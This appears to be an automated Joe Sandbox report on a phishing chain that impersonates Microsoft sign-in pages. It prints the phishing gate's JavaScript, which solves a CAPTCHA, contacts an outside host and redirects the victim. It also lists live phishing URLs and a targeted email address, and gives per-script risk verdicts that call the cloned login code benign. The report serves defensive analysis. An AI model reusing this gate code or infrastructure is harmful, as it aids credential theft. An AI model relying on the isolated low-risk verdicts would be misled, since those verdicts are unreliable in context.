Classification:	mal60.phis.win@20/39@24/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.110.84, 142.250.186.131, 142.250.186.78, 142.250.184.238, 142.250.185.238, 217.20.57.19, 142.250.184.206, 142.250.186.106, 142.250.184.202, 172.217.16.138, 142.250.185.74, 142.250.186.138, 142.250.186.42, 142.250.185.106, 142.250.185.138, 142.250.184.234, 216.58.212.170, 216.58.206.42, 172.217.18.10, 142.250.181.234, 172.217.18.106, 216.58.206.74, 172.217.16.202, 142.250.181.238, 142.250.186.46, 142.250.186.67, 216.58.206.46, 216.58.212.142, 184.28.90.27, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, csp.microsoft.com, azurefd-t-prod.trafficmanager.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==

Input	Output
URL: https://apple.com@jtkink.com Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": true, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": true, "third_party_hosting": true }
URL: https://apple.com@jtkink.com
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHM... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a simple function that handles form submission when an option is selected. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or suspicious redirects. The function is primarily responsible for updating the DOM and submitting a form, which are common and legitimate web development practices. Therefore, this script poses a low risk." }
function SelectOption(option) { var w = document.getElementById('waitingWheelDiv'); if(w) w.style.display = 'inline'; var i = document.getElementById('optionSelection'); i.value = option; document.forms['options'].submit(); return false; }
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHM... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a legitimate login functionality with standard input validation and form submission. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is focused on handling user input and form submission, which is a common and expected behavior for a login system. There are no indications of malicious intent or suspicious activities, so the overall risk score is low." }
//<![CDATA[ function Login() { } Login.userNameInput = 'userNameInput'; Login.passwordInput = 'passwordInput'; Login.initialize = function () { var u = new InputUtil(); u.checkError(); u.setInitialFocus(Login.userNameInput); u.setInitialFocus(Login.passwordInput); }(); Login.submitLoginRequest = function () { var u = new InputUtil(); var e = new LoginErrors(); var userName = document.getElementById(Login.userNameInput); var password = document.getElementById(Login.passwordInput); if (!userName.value \|\| !userName.value.match('[@\\\\]')) { u.setError(userName, e.userNameFormatError); return false; } if (!password.value) { u.setError(password, e.passwordEmpty); return false; } if (password.value.length > maxPasswordLength) { u.setError(password, e.passwordTooLong); return false; } document.forms['loginForm'].submit(); return false; }; InputUtil.makePlaceholder(Login.userNameInput); InputUtil.makePlaceholder(Login.passwordInput); //
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHM... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a legitimate login or authentication-related functionality. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is primarily focused on handling user input, form submission, and UI manipulation, which are common practices in web applications. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is consistent with typical authentication workflows and does not demonstrate any malicious intent." }
//<![CDATA[ function HRD() { } HRD.emailInput = 'emailInput'; HRD.emailMismatch = 'errorText'; HRD.selection = function (option) { var i = document.getElementById('hrdSelection'); i.name = "HomeRealmSelection"; i.value = option; document.forms['hrd'].submit(); return false; } HRD.showEmailInput = function () { var selection = document.getElementById('bySelection'); selection.style.display = 'none'; var email = document.getElementById('byEmail'); email.style.display = ''; var emailInput = document.getElementById('emailInput'); emailInput.focus(); } HRD.hideEmailInput = function () { var selection = document.getElementById('bySelection'); selection.style.display = ''; var email = document.getElementById('byEmail'); email.style.display = 'none'; } HRD.initialize = function () { var u = new InputUtil(); u.checkError(); var idpElements = document.getElementsByClassName('idp'); var emailError = document.getElementById(HRD.emailMismatch); if ((emailError && emailError.innerHTML) \|\| idpElements.length == 0) { HRD.showEmailInput(); u.setInitialFocus(HRD.emailInput); } else { HRD.hideEmailInput(); } } (); HRD.submitEmail = function () { var u = new InputUtil(); var e = new HRDErrors() var email = document.getElementById(HRD.emailInput); if (!email.value \|\| !email.value.match('[@]')) { u.setError(email, e.invalidSuffix); return false; } return true; }; InputUtil.makePlaceholder(HRD.emailInput); //
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHM... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a legitimate and benign workaround for various browser compatibility issues. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script is primarily focused on adjusting the user interface and handling browser-specific quirks, which is a common practice in web development. Overall, this script poses a low risk and is likely part of a legitimate application." }
//<![CDATA[ // Copyright (c) Microsoft Corporation. All rights reserved. // This file contains several workarounds on inconsistent browser behaviors that administrators may customize. "use strict"; // iPhone email friendly keyboard does not include "\" key, use regular keyboard instead. // Note change input type does not work on all versions of all browsers. if (navigator.userAgent.match(/iPhone/i) != null) { var emails = document.querySelectorAll("input[type='email']"); if (emails) { for (var i = 0; i < emails.length; i++) { emails[i].type = 'text'; } } } // In the CSS file we set the ms-viewport to be consistent with the device dimensions, // which is necessary for correct functionality of immersive IE. // However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original // values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone. // Windows 8 phone has agent string 'IEMobile 10.0' if (navigator.userAgent.match(/IEMobile\/10\.0/)) { var msViewportStyle = document.createElement("style"); msViewportStyle.appendChild( document.createTextNode( "@-ms-viewport{width:auto!important}" ) ); msViewportStyle.appendChild( document.createTextNode( "@-ms-viewport{height:auto!important}" ) ); document.getElementsByTagName("head")[0].appendChild(msViewportStyle); } // If the innerWidth is defined, use it as the viewport width. if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) { var viewport = document.querySelector("meta[name=viewport]"); viewport.setAttribute('content', 'width=' + window.innerWidth + 'px; initial-scale=1.0; maximum-scale=1.0'); } // Gets the current style of a specific property for a specific element. function getStyle(element, styleProp) { var propStyle = null; if (element && element.currentStyle) { propStyle = element.currentStyle[styleProp]; } else if (element && window.getComputedStyle) { propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp); } return propStyle; } // The script below is used for downloading the illustration image // only when the branding is displaying. This script work together // with the code in PageBase.cs that sets the html inline style // containing the class 'illustrationClass' with the background image. var computeLoadIllustration = function () { var branding = document.getElementById("branding"); var brandingDisplay = getStyle(branding, "display"); var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display"); if (brandingDisplay && brandingDisplay !== "none" && brandingWrapperDisplay && brandingWrapperDisplay !== "none") { var newClass = "illustrationClass"; if (branding.classList && branding.classList.add) { branding.classList.add(newClass); } else if (branding.className !== undefined) { branding.className += " " + newClass; } if (window.removeEventListener) { window.removeEventListener('load', computeLoadIllustration, false); window.removeEventListener('resize', computeLoadIllustration, false); } else if (window.detachEvent) { window.detachEvent('onload', computeLoadIllustration); window.detachEvent('onresize', computeLoadIllustration); } } }; if (window.addEventListener) { window.addEventListener('resize', computeLoadIllustration, false); window.addEventListener('load', computeLoadIllustration, false); } else if (window.attachEvent) { window.attachEvent('onresize', computeLoadIllustration); window.attachEvent('onload', computeLoadIllustration); } // Check whether the loginMessage element is present on this page. // Since we now have one page this is directly added to loginMessage v
URL: https://giannio.com/adfs/ls/?RedirectToIdentityPro... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a simple error reporting and handling functionality. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily focused on collecting and formatting error details to be sent via email, which is a common and legitimate practice. While it uses some legacy APIs like `innerText` and `insertAdjacentElement`, these are not inherently malicious. Overall, the script demonstrates benign behavior and is likely part of a larger application's error handling mechanism." }
//<![CDATA[ function ERR() { } ERR.report = function (email) { var errors = new Errors(); var body_message = ''; var activityID = document.getElementById('activityID').innerText; var details = document.getElementById('errorDetails'); if (details && details.childElementCount > 0) { var children = details.childNodes; for (var i = 0; i < children.length; i++) { if (children[i].innerText && children[i].innerText != '') { body_message = body_message + children[i].innerText + "%0A"; } }; } var mailto_link = 'mailto:' + email + '?subject=' + errors.reportSubject + " " + activityID + '&body=' + body_message; window.location = mailto_link; } ERR.showDetails = function () { var node = document.getElementById('errorDescription'); if (node) { node.style.display = (node.style.display == 'none') ? '' : 'none'; } } ERR.addDetail = function (text) { var detail = document.createElement('li'); detail.innerText = text; return detail; } ERR.addAgentDetails = function () { var node = document.getElementById('errorDetails'); node.insertAdjacentElement('beforeEnd', ERR.addDetail('Cookie: ' + (navigator.cookieEnabled ? 'enabled' : 'disabled'))); node.insertAdjacentElement('beforeEnd', ERR.addDetail('User agent string: ' + navigator.userAgent)); }(); //
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9mcy5uaHM... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This JavaScript snippet appears to be a utility function for handling input fields and error display. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is focused on providing a consistent user experience, including handling placeholder text and error messages. There are no signs of malicious intent or suspicious behavior, and the functionality aligns with typical user interface management tasks." }
//<![CDATA[ // Copyright (c) Microsoft Corporation. All rights reserved. function InputUtil(errTextElementID, errDisplayElementID) { if (!errTextElementID) errTextElementID = 'errorText'; if (!errDisplayElementID) errDisplayElementID = 'error'; this.hasFocus = false; this.errLabel = document.getElementById(errTextElementID); this.errDisplay = document.getElementById(errDisplayElementID); }; InputUtil.prototype.canDisplayError = function () { return this.errLabel && this.errDisplay; } InputUtil.prototype.checkError = function () { if (!this.canDisplayError){ throw new Error ('Error element not present'); } if (this.errLabel && this.errLabel.innerHTML) { this.errDisplay.style.display = ''; var cause = this.errLabel.getAttribute('for'); if (cause) { var causeNode = document.getElementById(cause); if (causeNode && causeNode.value) { causeNode.focus(); this.hasFocus = true; } } } else { this.errDisplay.style.display = 'none'; } }; InputUtil.prototype.setInitialFocus = function (input) { if (this.hasFocus) return; var node = document.getElementById(input); if (node) { if ((/^\s*$/).test(node.value)) { node.focus(); this.hasFocus = true; } } }; InputUtil.prototype.setError = function (input, errorMsg) { if (!this.canDisplayError) { throw new Error('Error element not present'); } input.focus(); if (errorMsg) { this.errLabel.innerHTML = errorMsg; } this.errLabel.setAttribute('for', input.id); this.errDisplay.style.display = ''; }; InputUtil.makePlaceholder = function (input) { var ua = navigator.userAgent; if (ua != null && (ua.match(/MSIE 9.0/) != null \|\| ua.match(/MSIE 8.0/) != null \|\| ua.match(/MSIE 7.0/) != null)) { var node = document.getElementById(input); if (node) { var placeholder = node.getAttribute("placeholder"); if (placeholder != null && placeholder != '') { var label = document.createElement('input'); label.type = "text"; label.value = placeholder; label.readOnly = true; label.style.position = 'absolute'; label.style.borderColor = 'transparent'; label.className = node.className + ' hint'; label.tabIndex = -1; label.onfocus = function () { this.nextSibling.focus(); }; node.style.position = 'relative'; node.parentNode.style.position = 'relative'; node.parentNode.insertBefore(label, node); node.onkeyup = function () { InputUtil.showHint(this); }; node.onblur = function () { InputUtil.showHint(this); }; node.style.background = 'transparent'; node.setAttribute("placeholder", ""); InputUtil.showHint(node); } } } }; InputUtil.focus = function (inputField) { var node = document.getElementById(inputField); if (node) node.focus(); }; InputUtil.hasClass = function(node, clsName) { return node.className.match(new RegExp('(\\s\|^)' + clsName + '(\\s\|$)')); }; InputUtil.addClass = function(node, clsName) { if (!this.hasClass(node, clsName)) node.className += " " + clsName; }; InputUtil.removeClass = function(node, clsName) { if (this.hasClass(node, clsName)) { var reg = new RegExp('(\\s\|^)' + clsName + '(\\s\|$)'); node.className = node.className.replace(reg, ' '); } }; InputUtil.showHint = function (node, gotFocus) { if (node.value && node.value != '') { node.previousSibling.style.display = 'none'; } else { node.previousSibling.style.display = ''; } }; InputUtil.updatePlaceholder = function (input, placeholderText) { var
URL: https://5eedab40.shaullerica.workers.dev/?email=ad... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates a mix of behaviors, including the use of a CAPTCHA system, data encryption, and a request to an external domain. While the CAPTCHA system and encryption suggest legitimate security measures, the script also includes some potentially suspicious elements, such as the use of an obfuscated URL and the redirection to an external domain. Additionally, the script appears to be handling sensitive user data (user agent) without clear transparency. Overall, the script requires further review to determine the full extent of its behavior and potential risks." }
var verifyCallback_CF = function (response) { if (response && response.length > 10) { sendRequest(); // Only send the request after CAPTCHA is solved } }; window.onloadTurnstileCallback = function () { turnstile.render("#turnstileCaptcha", { sitekey: "0x4AAAAAAA4tBTMXY0JFkmlC", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i]; if (c.match(/[a-z]/i)) { let code = encryptedText.charCodeAt(i); if ((code >= 65) && (code <= 90)) { c = String.fromCharCode(((code - 65 - shift + 26) % 26) + 65); } else if ((code >= 97) && (code <= 122)) { c = String.fromCharCode(((code - 97 - shift + 26) % 26) + 97); } } decryptedText += c; } return decryptedText; } function Encrypt(text, publicKey) { console.log('encrypt with public key:', publicKey); return text; } let sx = "https://bas-co.uk/?ekpjrgyb&qrc=adrianmarsh@nhs.net"; const PUBLIC_KEY = `-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1 R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8hv1ifOmf4Jrkis3tlW qpIO2U9Nle23D1VKpxZSxRyYTbnoyq3lRcqY5txOJKdviR9fA9wPidS6KTXhX2xq wq1jjYvgHtntEGYwK6Lzm6Q8jTjfV7ICqnV74GTKnPN7VMDKsS2+Dcf2Y2IoYY1o NM7nWPKFeVUmkqFMowkdBmGJHL4UqRcxbhiRX3AAzzdQvbQg7OQxYjbKak23IvDN 1ia9SsXQyo5H/XnfXB2Nb9sNayO5sV+hDmBRlujtm1+maqGMJUXZeVHL81Q7O22a WQIDAQAB -----END PUBLIC KEY-----`; function sendRequest() { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent); let xhr = new XMLHttpRequest(); xhr.open('GET', sx, true); xhr.setRequestHeader("accept", "application/json"); xhr.setRequestHeader("qrc-auth", EncryptedUserAgent); xhr.onreadystatechange = function() { if (xhr.readyState === XMLHttpRequest.DONE) { if (xhr.status === 200) { const cc = JSON.parse(xhr.responseText); if (cc.url) { window.location = cc.url; } else { document.body.innerHTML = cc.error ? cc.error : 'ACCESS DENIED'; } } else { document.body.innerHTML = 'CONNECTION TO HOST FAILED'; } } }; xhr.send(); }
URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to third-party domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose related to authentication and authorization, the lack of transparency around the data being sent and the use of multiple domains warrant further review. The overall risk score is in the medium range, indicating the need for closer inspection to ensure the script's security and privacy practices align with best practices." }
//<![CDATA[ $Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://giannio.com/aadcdn.msauth.net/~/shared/1.0/","urlDefaultFavicon":"https://giannio.com/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000\u0026redirect_uri=https%3a%2f%2fgiannio.com%2fowa%2f\u0026resource=00000002-0000-0ff1-ce00-000000000000\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid\u0026msafed=1\u0026msaredir=1\u0026login_hint=adrianmarsh%40nhs.net\u0026client-request-id=7eadc719-c4bc-c7c3-6003-869715ae4f56\u0026protectedtoken=true\u0026claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d\u0026nononce=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4\u0026state=DctBDoMgEEBRaM_S7tARh3FYNB7FDEUKicVETXr9snh_97VS6t7cGg0taqKRJ4vEQNYhswPuUoTkBxeNewcwSJaMtzSaBOJxiCHQirq9z37_ST9v-6fUJZd6vSQeRepXjjM_EGo-u7pefw\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://giannio.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=7eadc719-c4bc-c7c3-6003-869715ae4f56","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=7eadc719-c4bc-c7c3-6003-869715ae4f56","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=7eadc719-c4bc-c7c3-6003-869715ae4f56\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=7eadc719-c4bc-c7c3-6003-869715ae4f56\u0026origin=giannio.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeNIcoJkOEDCOQJRLU16AcdhwfTv8kDpVGAFF1Qcdx7vC7GUajDthA_IRweHjU4V3ziOjCxZHY2L7vKCT7-8MWQ-NWC9YfHppx-kmpJVnz_yJi_BvJNJSP_EXEMzygFubzIN4QXIDEcB4Etv6b--3lVj4_7QPYruGV8tm11QnHvkJnFUY08lcxjF-fppm1jzNtOFd8HF-zejLLQiMIu6KwxiAA","canary":"gY3O7IRc3rnYriVLRcHls2nD/plSufZZ5iwP5fer3Vs=3:1:CANARY:tUCAP6hYR7EqjycbMDIasX+lPvBV+q2+aEgU7gHJs0Q=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"7eadc719-c4bc-c7c3-6003-869715ae4f56","sessionId":"add632a0-44db-43c9-ad00-9269c17e9601","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://giannio.com/common/instrumentation/reportpageload","dssostatus":"https://giannio.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1
URL: https://giannio.com/aadcdn.msauth.net/~/shared/1.0... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The code is also accompanied by a third-party notice, indicating it is likely part of a larger, well-documented project. While the script uses some legacy practices like `XDomainRequest`, these pose only minor risks and are not inherently malicious. Overall, the snippet seems to be a benign implementation of a standard web API, with no clear signs of malicious intent." }
/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. * * json2.js (2016-05-01) * https://github.com/douglascrockford/JSON-js * License: Public Domain * * Provided for Informational Purposes Only * * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind\|\|(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head\|\|document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise\|\|(window.Promise=e),window.Promise.all\|\|(window.Promise.all=e.all),window.Promise.allSettled\|\|(window.Promise.allSettled=e.allSettled),window.Promise.race\|\|(window.Promise.race=e.race),window.Promise.reject\|\|(window.Promise.reject=e.reject),window.Promise.resolve\|\|(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots\|\|[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var
URL: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please stand by, while we are checking if the site connection is secure\nWe need to review the security of your connection before proceeding.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5... Model: Joe Sandbox AI	```json { "risk_score": 2, "reasoning": "The script includes moderate-risk indicators such as aggressive DOM manipulation and error reporting to third-party domains. However, there are no high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, which reduces the risk score." }
//<![CDATA[ !function(){var e=window,r=e.$Debug=e.$Debug\|\|{},t=e.$Config\|\|{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog\|\|25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs\|\|[],u=n.$WebWatson;try{ var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r\|\|this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do\|\|(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)\|\|o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n\|\|(a=n, u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){ for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener\|\|"load"===e.type\|\|"complete"===r.readyState)&&t()}function i(){ r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){ return f.$Config\|\|f.ServerData\|\|{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src\|\|r.href\|\|"")+"'",e+=", id:"+(r.id\|\|""),e+=", async:"+(r.async\|\|""),e+=", defer:"+(r.defer\|\|"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE 